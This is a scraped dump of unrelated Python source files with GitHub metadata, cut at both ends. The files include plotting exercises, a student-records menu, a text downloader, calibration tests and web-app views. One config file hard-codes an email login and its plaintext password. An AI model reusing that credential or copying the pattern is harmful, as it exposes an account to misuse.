tf.contrib.layers.fully_connected(p_h2, 1, activation_fn=tf.identity)\n return logits#確率\n \n def proper_shape(arr):#!input numpyarray\n if arr.ndim==1:\n return np.reshape(arr,(arr.shape[0],1))\n return arr\n","repo_name":"KtechB/spinningup_gail_extension-","sub_path":"discriminator_js.py","file_name":"discriminator_js.py","file_ext":"py","file_size_in_byte":8781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38575731836","text":"import time\n\nwith open('input.txt','r') as f:\n\tlistl=[]\n\tfor line in f:\n\t\tstrip_lines=line.strip()\n\t\tm=listl.append(strip_lines)\n\ncounter = 0\nfor i in range(len(listl)):\n if( i == 0):\n continue\n elif(listl[i] > listl[i-1]):\n print(\"Increased\")\n counter += 1\n else:\n print(\"Decreased\")\n\nprint(\"Vyslo nam zde {}\".format(counter))","repo_name":"donicjak/advent_of_code","sub_path":"01/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9260582521","text":"import json\nwhile True:\n try:\n with open('ITT_Student.json', 'r', encoding='utf8') as json_file:\n json_object = json.load(json_file)\n json_string = json.dumps(json_object)\n g_json_big_data = json.loads(json_string)\n except FileNotFoundError:\n print(\"json파일이 존재하지 않습니다.\")\n print(\"1. json파일이 존재하는 경로를 지정한다.\")\n print(\"2. json파일을 신규 생성한다.\")\n file_choice = input(\"어떻게 하시겠습니까?: \")\n if file_choice == \"1\":\n pass\n elif file_choice == \"2\":\n pass\n #file_choice가 1이거나 오류가 나지 않으면 학생 정보조회, 정보수정, 정보삭제를 수행한다. #file_choice가 2면 2,3,4에 없다고 띄운다. #선택지 1과 4의 경우에는 끝나고 파일을 저장하고 다시 처음부터 시작하게 한다.\n while True:\n print(\"1.학생 정보입력\")\n print(\"2.학생 정보조회\")\n print(\"3.학생 정보수정\")\n print(\"4.학생 정보삭제\")\n print(\"5.프로그램 종료\")\n menu_choice = input(\"메뉴를 선택하세요: \")\n if menu_choice ==\"1\": #학생 정보 입력\n if file_choice == \"2\":\n new_name = input(\"이름 (예:홍길동): \")\n new_age = input(\"나이 (예:29): \")\n new_post = input(\"주소 (예: 대구광역시 동구 아양로 135): \")\n lecture_took_time = input(\"과거 수강 횟수(예:1): \")\n lecture_current_pf = input(\"현재 수강 과목이 있습니까? (예:y/n): \")\n if lecture_current_pf == \"n\":\n break\n elif lecture_current_pf ==\"y\":\n new_lecture_code = input(\"강의코드 (예:IB171106,OB0104..): \")\n new_lecuture_name = input(\"강의명 (예:IOT 빅데이터 실무반): \")\n new_instructor = input(\"강사 (예:이현구): \")\n new_open_date = input(\"개강일 (예:2017-11-06): \")\n new_close_date = input(\"종료일 (예ㅣ2018-09-05): \")\n lucture_current_pf_2 = input(\"현재 수강 과목이 더 있습니까? (예:y/n): \")\n\n\n quit()\n elif menu_choice ==\"2\":#학생 정보조회\n if file_choice == \"2\":\n print(\"먼저 학생 정보를 입력해야 합니다.\")\n continue\n quit()\n elif menu_choice ==\"3\":#학생 정보수정\n if file_choice == \"2\":\n print(\"먼저 학생 정보를 입력해야 합니다.\")\n continue\n quit()\n elif menu_choice ==\"4\":#학생 정보 삭제\n if file_choice == \"2\":\n print(\"먼저 학생 정보를 입력해야 합니다.\")\n continue\n quit()\n elif menu_choice ==\"5\":#프로그램 종료\n quit()\n else:\n print(\"잘못입력하셨습니다.\")\n continue\n\n\n\n","repo_name":"xsky21/bigdata2019","sub_path":"01_jump to python/CHAP07/4_q/json_exer.py","file_name":"json_exer.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8635192563","text":"import datetime\nfrom celery import Task\nfrom PIL import Image\n\n\nclass ImageResizeTask(Task):\n def __init__(self):\n self.ignore_result = True\n\n def run(self, obj):\n img = Image.open(obj.image)\n img = img.resize((img.size[0]/2, img.size[1]/2), Image.ANTIALIAS)\n obj.image = img\n obj.time_of_end_converting_job = datetime.datetime.now()\n obj.save()\n\n\n","repo_name":"takeiteasyguy/image_resizing","sub_path":"app/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69794275768","text":"# log file setting\ntime_format = '%Y_%m_%d_%H_%M_%S'\nserver_log_file_name = \"server\"\nurl_hashing_character_count = 8\n\n# flask server setting\nserver_responses = {\n \"successful_get\": (\n 200\n ),\n \"successful_post\":(\n {\"message\":\"Your request has been received. The extracted note will be sent to you shortly\"},\n 200\n ),\n \"failed_post_url\": (\n {\"message\": \"the url provided is not a valid YouTube video address\"},\n 400\n ),\n \"failed_post_email\": (\n {\"message\": \"the email provided is not a valid email address\"},\n 400\n )\n}\n\n# async worker setting\ncelery_backend = 'redis://localhost:6379'\ncelery_broker = 'redis://localhost:6379'\n\n\n# media setting\nmedia_folder = \"../media/\"\nsource_video_file_name = \"source_video\"\ndefault_num_of_video_clip = 3\n\n\n# email setting\nemail_usrname = \"thenote2go@gmail.com\"\nemail_password = \"TheNote2Go\"\nemail_subject = \"Your recipe is ready to go!\"\nemail_body = \"Check out the attached pdf file for your recipe\"","repo_name":"Note2Go/recipe2go","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"2975335767","text":"import math\nimport sys\n\ndef main():\n try:\n a, b, c = eval(input(\"Please enter the coefficients (a, b, c): \"))\n disc = b * b - 4 * a * c\n if disc > 0:\n discRoot = math.sqrt(b * b - 4 * a * c)\n root1 = (-b + discRoot) / (2 * a)\n root2 = (-b - discRoot) / (2 * a)\n print(\"\\nThe solutions are:\", root1, root2)\n elif disc == 0:\n root = (-b) / (2 * a)\n print(\"\\nThe solution is:\", root)\n else:\n # print()\n print('\\nThere are no solutions')\n except ValueError as err:\n if 'not enough values to unpack' in str(err):\n print('nije uneto dovoljno vrednosti!')\n elif 'too many values to unpack' in str(err):\n print('uneto previse vrednosti!')\n else:\n print(err)\n except NameError:\n print('vrednosti moraju biti brojevi')\n except SyntaxError:\n print('moraju se uneti vrednosti')\n except ZeroDivisionError:\n print('parametar a ne sme biti 0')\n\n\nmain()","repo_name":"vlaksi/OsnovneRacunarstva-BMI","sub_path":"Predavanja/06 Grananje/Predavanja/primeriSaPredavanja/primer2.py","file_name":"primer2.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19366514469","text":"print(\"Welcome, Basant Bhatt\")\r\n\r\nimport math\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\nmass = []\r\nacc = []\r\n\r\nH = 100 ## kg\r\nu = 1/5 ## frictional coefficient\r\nm = 450 ## (Maximum load you want to input + 50 ) \r\n\r\n\r\nfreq = {}\r\namp = {}\r\n\r\nfor i in range(50, m, 50): ## calculation starts from 50kg with the increment of 50kg\r\n \r\n a = (H/i) - u\r\n acc.append(a)\r\n \r\n freq['fre_' + str(i)] = []\r\n amp['amp_' + str(i)] = 1000*[]\r\n \r\n \r\n for j in range (5, 100, 5): ### j is the amplitude\r\n \r\n amp['amp_' + str(i)].append(j)\r\n \r\n f =math.sqrt(a/(j/1000)) / (2 * math.pi )\r\n freq['fre_' + str(i)].append(f)\r\n \r\n \r\n mass.append(i)\r\n\r\n\r\n\r\n### Graph Plotting of the values\r\nfor i in range(50, m, 50):\r\n plt.plot(freq['fre_' + str(i)], amp['amp_' + str(i)], label= (str(i) + \"kg\"))\r\n \r\n\r\nfont = {'family': 'serif', ## Making font styles\r\n 'color': 'black',\r\n 'weight': 'normal',\r\n 'size': 16,\r\n }\r\n \r\n\r\nplt.style.use('fivethirtyeight')\r\n\r\nplt.grid(True) ## shows Major grid lines, automatically\r\nplt.grid(which='minor', alpha = 0.2, linewidth= 0.8) ## Shows minor grid lines between the major grid line\r\nplt.minorticks_on() ## Shows minor tick(|) marks in x&y axies\r\n\r\nplt.axvline(x=0, ymin=0, ymax=0) ## shows the x=0 line in graph\r\nplt.axhline(y=0, xmin=0, xmax=0) ## shows the y=0 line in graph\r\n\r\nplt.title(\" Freq vs Amp\", fontdict = font)\r\nplt.xlabel(\"Frequency(Hz)\", fontdict = font)\r\nplt.ylabel(\"Amplitude(mm)\", fontdict = font)\r\n\r\nplt.tight_layout()\r\nplt.legend()\r\n\r\nplt.savefig(\"Freq_vs_amp_with_all_mass.png\")\r\nplt.show()\r\n\r\nprint(\"Thank you Basant Bhatt\")\r\n","repo_name":"BasantBhatt/Shake_Table","sub_path":"freq_vs_amp_for_all_mass.py","file_name":"freq_vs_amp_for_all_mass.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19207530022","text":"# matplotlib\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# ==================================[ matplotlib 실습]==================================\r\n\r\n# 1. Boston 데이터 시각화 실습 문제\r\n#\r\n# 1.1 boston_train.csv 파일을 읽어와서 log plot을 출력하세요\r\n# 'CRIM'과 'MEDV' 컬럼의 데이터를 사용한다\r\n\r\n# 한글패치\r\nimport matplotlib\r\nmatplotlib.rcParams['font.family']='Malgun Gothic'\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\n\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\ndf = df.groupby('MEDV').agg(np.mean)\r\n# plt.hist(df)\r\nMEDV = df.index.values\r\nCRIM = df['CRIM'].values\r\npoly = np.polyfit(MEDV,np.log(CRIM),deg=1)\r\nplt.semilogy(MEDV,CRIM,'o')\r\n# plt.semilogy(MEDV,CRIM)\r\nplt.semilogy(MEDV,np.exp(np.polyval(poly,MEDV)))\r\nplt.show()\r\n\r\n\r\n# 1.2 boston_train.csv 파일을 읽어와서 scatter plot을 출력하세요\r\n# # 'CRIM'과 'MEDV','ZN' 컬럼의 데이터를 사용한다\r\n\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\ndf = df.groupby('MEDV').agg(np.mean)\r\ngpu = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\ngpu = gpu.groupby('MEDV').agg(np.mean)\r\ngpu\r\ndf2 = pd.merge(df,gpu,how='outer',left_index=True,right_index=True)\r\ndf.mean()\r\n\r\nMEDV = df.index.values\r\nCRIM = df['CRIM'].values\r\nZN = df['ZN'].values\r\nzz = np.log(CRIM)\r\nzz\r\nplt.scatter(MEDV,zz)\r\nplt.show()\r\n\r\nplt.scatter(MEDV,cnt_s = ZN)\r\nplt.show()\r\n\r\n\r\n# 1.4 boston_train.csv파일을 읽어와서 3차원 plot을 출력하세요\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\nfrom mpl_toolkits.mplot3d.axes3d import Axes3D\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\ndf.columns\r\n\r\nfig = plt.figure()\r\nax = Axes3D(fig)\r\n\r\nx = df['CRIM'].values\r\ny = np.where(df['MEDV'].values>0,\r\n np.log(df['MEDV'].values),0)\r\nz = np.where(df['ZN'].values>0,\r\n np.log(df['ZN'].values),0)\r\n\r\nx,y = np.meshgrid(x,y)\r\nz,_=np.meshgrid(z,0)\r\n\r\nax.plot_surface(x,y,z)\r\nax.set_xlabel('CRIM')\r\nax.set_ylabel('MEDV')\r\nax.set_zlabel('ZN')\r\nax.set_title(\"재광's\")\r\nplt.show()\r\n\r\n\r\n# 1.5 boston_train.csv파일을 읽어와서 지연 plot을 출력하세요\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\n\r\n# 1) 풀이\r\nfrom pandas.plotting import lag_plot\r\nlag_plot(np.log(df['MEDV']))\r\nlag_plot(np.log(df['CRIM']))\r\nplt.show()\r\n\r\n# 2) 풀이\r\nlag_plot(np.log(df['MEDV']))\r\nplt.show()\r\n\r\n\r\n# 1.6 boston_train.csv 파일을 읽어와서 자기 상관 plot을 출력하세요\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\nfrom pandas.plotting import autocorrelation_plot\r\nautocorrelation_plot(np.log(df['MEDV']))\r\nplt.show()\r\n\r\n\r\n# 1.7 boston_train.csv 파일을 읽어와서 pandas를 사용해서\r\n# 전체 컬럼의 box plot과 'TAX' 컬럼의 box plot을 출력하세요\r\n\r\nimport numpy as np\r\n\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\n\r\ndf = np.log(df.values)\r\ndf.plot.box()\r\nplt.show()\r\n\r\n\r\nplt.boxplot(df)\r\n\r\n\r\n\r\n# =======================강사 답안===========================================================\r\n\r\n# matplotlib_실습문제.py\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nimport matplotlib\r\nmatplotlib.rcParams['font.family'] = 'Malgun Gothic'\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\n\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\n\r\n\r\n\r\n# 1.1번 로그플롯\r\ncrim = df['CRIM'].values\r\nmedv = df['MEDV'].values\r\n\r\npoly = np.polyfit(crim,np.log(medv),deg=1) # 학습\r\nprint(type(poly))\r\nprint('Poly',poly[0]) # W, 기울기\r\nprint('Poly',poly[1]) # b, y절편\r\n# plt.plot(crim,np.log(medv),'o')\r\n# plt.show()\r\nplt.semilogy(crim,medv,'o')\r\nplt.semilogy(crim,np.exp(np.polyval(poly,crim)))\r\nplt.title('1.1 Boston crim/zn medv scatter plot')\r\n\r\nplt.show()\r\nprint(df.corr())\r\n\r\n\r\n\r\n\r\n# 1.2번 분산 플롯\r\ncrim = df['CRIM'].values\r\nmedv = df['MEDV'].values\r\nzn = df['ZN'].values\r\n\r\n# c: color, s:size, apha:투명도\r\nplt.scatter(crim,medv,c = 200*crim,\r\n s =20 + 200*zn/zn.max(),\r\n alpha = 0.5) # 버블차트\r\n\r\nplt.grid(True)\r\nplt.xlabel('crim')\r\nplt.ylabel('medv')\r\nplt.title('1.2 Boston crim/zn medv scatter plot')\r\nplt.show()\r\n\r\n\r\n\r\n# 1.3 번\r\ncrim = df['CRIM'].values\r\nmedv = df['MEDV'].values\r\n\r\npoly = np.polyfit(crim,np.log(medv),deg=1) # 학습\r\nplt.plot(crim, np.polyval(poly, crim), label='Fit')\r\n\r\nmedv_start = int(medv.mean())\r\nprint(medv_start )\r\ny_ann = np.log(df.at[medv_start, 'MEDV']) - 0.1\r\nprint(y_ann)\r\nann_str = \"Medv Crime\\n %d\" % medv_start\r\nplt.annotate(ann_str, xy=(medv_start, y_ann),\r\n arrowprops=dict(arrowstyle=\"->\"),\r\n xytext=(-30, +70), textcoords='offset points')\r\n\r\ncnt_log = np.log(medv)\r\nplt.scatter(crim, cnt_log, c= 200 * crim,\r\n s=20 + 200 * zn/zn.max(),\r\n alpha=0.5, label=\"Scatter Plot\")\r\nplt.legend(loc='upper right')\r\nplt.grid()\r\nplt.xlabel(\"Crime\")\r\nplt.ylabel(\"Medv\", fontsize=16)\r\nplt.title(\"1.3 Boston Housing : Crime Medv\")\r\nplt.show()\r\n\r\n\r\n# ==============================================================\r\n\r\n# titanic실습과제.py\r\n\r\n# https://kaggle-kr.tistory.com/17\r\n\r\nimport pandas as pd\r\nimport seaborn as sb\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# 한글 출력을 위한 설정\r\nimport matplotlib\r\nmatplotlib.rcParams['font.family']=\"Malgun Gothic\"\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\n\r\ntitanic = sb.load_dataset('titanic')\r\n\r\n\r\n# 한글 출력을 위한 설정\r\nimport matplotlib\r\nmatplotlib.rcParams['font.family']=\"Malgun Gothic\"\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\n\r\ntitanic = sb.load_dataset('titanic')\r\n\r\n# 2.1 생존자와 사망자의 수를 pie 차트로 그리시오(matplotlib)\r\n\r\nsurvived = titanic['survived'][titanic['survived'] == 1].count()\r\n\r\nnot_survived = titanic['survived'][titanic['survived'] ==0].count()\r\ndata = [survived,not_survived]\r\npie_label = ['생존자','사망자']\r\nexp = [0.05,0.05]\r\nplt.figure(figsize=(5,5))\r\nplt.pie(data,labels = pie_label,explode = exp,\r\n autopct ='%.1f%%',shadow = True)\r\nplt.title('2.1 Titanic Survived - Pie Chart')\r\nplt.show()\r\n\r\n\r\n# 2.2 등급별 티켓 비용(fare)의 평균을 barplot으로 그리시오(seaborn)\r\nsb.barplot('pclass','fare', data=titanic)\r\nplt.title('2.2 Titanic pclass/fare - barplot')\r\nplt.show()\r\n\r\n# 2.3 성(Sex)별 생존자와 사망자의 수를 countplot 으로 그리시오(seaborn)\r\nsb.countplot(data=titanic,x='sex',hue='survived')\r\nplt.title('2.3 Titanic Survived/sex - countplot')\r\nplt.show()\r\n\r\n\r\n# 2.4 상관 관계 heatmap을 출력하시요 (seaborn)\r\nplt.figure(figsize=(10, 10))\r\nsb.heatmap(titanic.corr(), linewidths=0.01, square=True,\r\n annot=True, cmap=plt.cm.viridis, linecolor=\"white\")\r\nplt.title('2.4 Titanic Correlation between features')\r\nplt.show()\r\n\r\n# 2.5 나이(age) 분포도(distplot)를 그리시오 (seaborn)\r\n# 결측치는 평균값으로 수정\r\ntitanic = titanic.fillna(titanic.mean())\r\nsb.distplot(titanic['age'])\r\nplt.title('2.5 Titanic age - distplot')\r\nplt.show()\r\n\r\n\r\n# 2.6 객실의 등급(pclass)별 'age'의 분포를 boxplot으로 그리시오(seaborn)\r\ntitanic = sb.load_dataset('titanic')\r\n\r\nsb.boxplot(data=titanic, x='pclass',y='age')\r\n\r\ndf = titanic.groupby('pclass')\r\nmed = df.agg([np.median])\r\nr = med['age']\r\nt0 = r['median'].values[0]\r\nt1 = r['median'].values[1]\r\nt2 = r['median'].values[2]\r\nplt.text(0,t0, round(t0,2))\r\nplt.text(1,t1, round(t1,2))\r\nplt.text(2,t2, round(t2,2))\r\n\r\nplt.title('2.6 Titanic pclass/age - boxplot')\r\nplt.show()","repo_name":"kjkjv/python","sub_path":"matplotlib.py","file_name":"matplotlib.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35615924837","text":"n = int(input())\nmax = 0\nc = 0\nfor i in range(n):\n a, b = [int(i) for i in input().split()]\n c -= a\n c += b\n if max < c:\n max = c\nprint(max)\n","repo_name":"ciberdiego123/python-coding","sub_path":"code_python/tram.py","file_name":"tram.py","file_ext":"py","file_size_in_byte":160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41556902819","text":"import logging\n\nLOG_FILENAME = 'example.log'\nlogging.basicConfig(filename=LOG_FILENAME, level=logging.DEBUG, filemode='w')\n# create logger\nlogger = logging.getLogger(\"simple_example\")\nlogger.setLevel(logging.DEBUG)\n# create console handler and set level to debug\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\n# create formatter\nformatter = logging.Formatter(\"%(levelname)s - %(message)s\")\n\n# \"application\" code\nlogger.info(\" info message\")\nlogger.warn(\" warn message\")\n\n","repo_name":"12leclarkson/shaft_design","sub_path":"logging_test.py","file_name":"logging_test.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42363660722","text":"############ NATIVE IMPORTS ###########################f\nfrom os import system\n############ INSTALLED IMPORTS ###########################\n############ LOCAL IMPORTS ###########################\n##########################################################\ndef download_tanakh():\n PATH_TO_SAVE = \"tanakh/{cannon}/{book}_{language_code}.json\"\n LANGUAGES = (\"English\",\"Hebrew\")\n CANNON_BOOKS_MAP = {\n \"Torah\":[\"Deuteronomy\",\"Exodus\",\"Genesis\",\"Leviticus\",\"Numbers\"],\n \"Prophets\":[\n \"Amos\",\"Ezekiel\",\"Habakkuk\",\"Haggai\",\"Hosea\",\n \"I%20Kings\",\"I%20Samuel\",\"II%20Kings\",\"II%20Samuel\",\n \"Isaiah\",\"Jeremiah\",\"Joel\",\"Jonah\",\"Joshua\",\n \"Judges\",\"Malachi\",\"Micah\",\"Nahum\",\"Obadiah\",\n \"Zechariah\",\"Zephaniah\"\n ],\n \"Writings\":[\n \"Daniel\",\"Ecclesiastes\",\"Esther\",\"Ezra\",\n \"I%20Chronicles\",\"II%20Chronicles\",\"Job\",\n \"Lamentations\",\"Nehemiah\",\"Proverbs\",\n \"Psalms\",\"Ruth\",\"Song%20of%20Songs\"\n ]\n }\n URL = \"https://raw.githubusercontent.com/Sefaria/Sefaria-Export/master/json/Tanakh/{cannon}/{book}/{language}/merged.json\"\n\n for cannon,books in CANNON_BOOKS_MAP.items():\n for book in books:\n for language in LANGUAGES:\n url = URL.format(\n cannon=cannon,\n book=book,\n language=language\n )\n path_to_save = PATH_TO_SAVE.format(\n cannon=cannon.lower(),\n book=book.lower(),\n language_code = language[:2].lower()\n )\n system(f\"curl {url} --output {path_to_save}\")\n\ndef download_kabbalah():\n PATH_TO_SAVE = \"kabbalah/{book}_{language_code}.json\"\n LANGUAGES = (\"English\",\"Hebrew\")\n BOOKS = (\"Zohar\",\"Sefer%20Yetzirah\")\n URL = \"https://raw.githubusercontent.com/Sefaria/Sefaria-Export/master/json/Kabbalah/{book}/{language}/merged.json\"\n\n for book in BOOKS:\n for language in LANGUAGES:\n url = URL.format(\n book=book,\n language=language\n )\n path_to_save = PATH_TO_SAVE.format(\n book=book.lower(),\n language_code = language[:2].lower()\n )\n system(f\"curl {url} --output {path_to_save}\")\n","repo_name":"mohammedterryjack/quran-data","sub_path":"raw_data/download_sefaria.py","file_name":"download_sefaria.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"19536178081","text":"\n\n\n#%% imports\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nimport os\n\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\n\nfrom sklearn.metrics import classification_report\n\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.calibration import calibration_curve\n\n\n# ##################\n# Messed around with proba calibration stuff\n# didn't find much interesting\n\n\n\n\n\n#%% data\n\ndata_X, data_Y = load_iris(return_X_y = True)\n\ndata_Y = (data_Y == 1).astype(int)\n\n\n\n\n#%% \n\n\n\nmodels_base = [LogisticRegression(), GaussianNB(), RandomForestClassifier(), SVC(probability = True)]\n\n# TRAIN TEST\n\nsss = StratifiedShuffleSplit(n_splits = 1, test_size = 0.2)\n\nfor train_index, test_index in sss.split(data_X, data_Y):\n X_train, Y_train = data_X[train_index], data_Y[train_index]\n X_test, Y_test = data_X[test_index], data_Y[test_index]\n#\n\n# TRAIN VAL CV + CALIBRATION\n\nsss = StratifiedShuffleSplit(n_splits = 5, test_size = 0.2)\n\nfor train_index, val_index in sss.split(X_train, Y_train):\n print('######## Fold')\n X_t, Y_t = X_train[train_index], Y_train[train_index]\n X_val, Y_val = X_train[val_index], Y_train[val_index]\n \n for model in models_base:\n print(model)\n plt.figure(figsize = (10, 10))\n plt.title(model)\n #\n temp_model = model.fit(X_t, Y_t)\n #//\n print('**')\n print(f'Base Val Score : {temp_model.score(X_test, Y_test):0.2}')\n y_pred = temp_model.predict_proba(X_test)[:, 1]\n prob_true, prob_pred = calibration_curve(Y_test, y_pred, n_bins=10)\n plt.plot(prob_pred, prob_true, marker='.', label = 'base')\n print(classification_report(Y_test, y_pred >= 0.5))\n #\\\\\n \n temp_calibrated = CalibratedClassifierCV(base_estimator = temp_model, \n method = 'sigmoid', \n cv = 'prefit').fit(X_val, Y_val)\n #//\n print('**')\n print(f'Sig Calibrated Val Score : {temp_calibrated.score(X_test, Y_test):0.2}')\n y_pred = temp_calibrated.predict_proba(X_test)[:, 1]\n prob_true, prob_pred = calibration_curve(Y_test, y_pred, n_bins=10)\n plt.plot(prob_pred, prob_true, marker='.', label = 'sig calib')\n print(classification_report(Y_test, y_pred >= 0.5))\n #\\\\\n \n temp_calibrated = CalibratedClassifierCV(base_estimator = temp_model, \n method = 'isotonic', \n cv = 'prefit').fit(X_val, Y_val)\n #//\n print('**')\n print(f'Iso Calibrated Val Score : {temp_calibrated.score(X_test, Y_test):0.2}')\n y_pred = temp_calibrated.predict_proba(X_test)[:, 1]\n prob_true, prob_pred = calibration_curve(Y_test, y_pred, n_bins=10)\n plt.plot(prob_pred, prob_true, marker='.', label = 'iso calib')\n print(classification_report(Y_test, y_pred >= 0.5))\n #\\\\\n \n print('')\n \n plt.plot([0, 1], [0, 1], linestyle='--')\n plt.legend(loc = 'best')\n plt.show()\n #\n#\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yoann-ba/utils_misc","sub_path":"tests_calibration_proba.py","file_name":"tests_calibration_proba.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43212172727","text":"from typing import Union\n\nfrom dataclasses_json import config\n\nfrom chainpy.eth.ethtype.exceptions import EthNotHex\nfrom chainpy.eth.ethtype.hexbytes import EthHexBytes, EthHashBytes, EthAddress\nfrom chainpy.eth.ethtype.utils import is_hex\n\n\"\"\"\n{TYPE}Meta - store value as a specific \"TYPE\"\n- decoder: importing function\n- encoder: exporting function\n\"\"\"\n\n\ndef hex_to_int(value: Union[str, int]) -> int:\n if isinstance(value, int):\n return value\n if is_hex(value):\n ret = int(value, 16)\n return ret\n # return int(value, 16)\n raise EthNotHex(type(value))\n\n\nIntegerMeta = config(\n decoder=lambda value: hex_to_int(value) if value is not None and value != \"\" else None,\n encoder=lambda value: hex(value) if value is not None else None\n)\n\nEthHexBytesMeta = config(\n decoder=lambda value: EthHexBytes(value),\n encoder=lambda value: value.hex() if value is not None else None\n)\n\nEthHexBytesListMeta = config(\n decoder=lambda values: [EthHexBytes(value) for value in values],\n encoder=lambda values: [value.hex() for value in values]\n)\n\nEthHashBytesMeta = config(\n decoder=lambda value: EthHashBytes(value),\n encoder=lambda value: value.hex() if value is not None else None\n)\n\nEthHashBytesListMeta = config(\n decoder=lambda values: [EthHashBytes(value) for value in values],\n encoder=lambda values: [value.hex() for value in values]\n)\n\nEthAddrMeta = config(\n decoder=lambda value: EthAddress(value),\n encoder=lambda value: value.hex() if value is not None else None\n)\n\nEthAddrListMeta = config(\n decoder=lambda values: [EthAddress(value) for value in values],\n encoder=lambda values: [value.hex() for value in values]\n)\n","repo_name":"bifrost-platform/bifrost-python-lib","sub_path":"chainpy/eth/ethtype/dataclassmeta.py","file_name":"dataclassmeta.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"3750437632","text":"import tempfile\nimport itertools\n\nfrom pyramid.httpexceptions import HTTPFound\nfrom pyramid.view import view_config\nfrom pyramid.url import route_url\nfrom pyramid.renderers import render_to_response\nfrom pyramid.response import Response\n\nfrom OSMTM.models import DBSession\nfrom OSMTM.models import Job\nfrom OSMTM.models import User\nfrom OSMTM.models import Tile\nfrom OSMTM.models import TileHistory\nfrom OSMTM.models import Tag\nfrom OSMTM.models import License\n\nfrom OSMTM.views.views import EXPIRATION_DURATION, checkTask\nfrom OSMTM.views.tasks import get_locked_task\n\nfrom OSMTM.utils import parse_float\n\nfrom shapely.wkt import loads\n\nfrom geojson import Feature, FeatureCollection\nfrom geojson import dumps\n\nimport simplejson\n\nfrom sqlalchemy.sql.expression import and_\n\nfrom pyramid.security import authenticated_userid\n\nfrom paste.fileapp import FileApp\n\nimport logging\nlog = logging.getLogger(__name__)\n\n@view_config(route_name='job', renderer='job.mako', permission='job',\n http_cache=0)\ndef job(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n if job is None:\n request.session.flash(\"Sorry, this job doesn't exist\")\n return HTTPFound(location = route_url('home', request))\n\n for tile in job.tiles:\n checkTask(tile)\n\n username = authenticated_userid(request)\n user = session.query(User).get(username)\n\n current_task = get_locked_task(id, username)\n\n admin = user.is_admin() if user else False\n return dict(job=job, user=user,\n bbox=loads(job.geometry).bounds,\n tile=current_task,\n admin=admin,\n )\n\n@view_config(route_name='job_stats', renderer='json', permission='job',\n http_cache=0)\ndef job_stats(request):\n id = 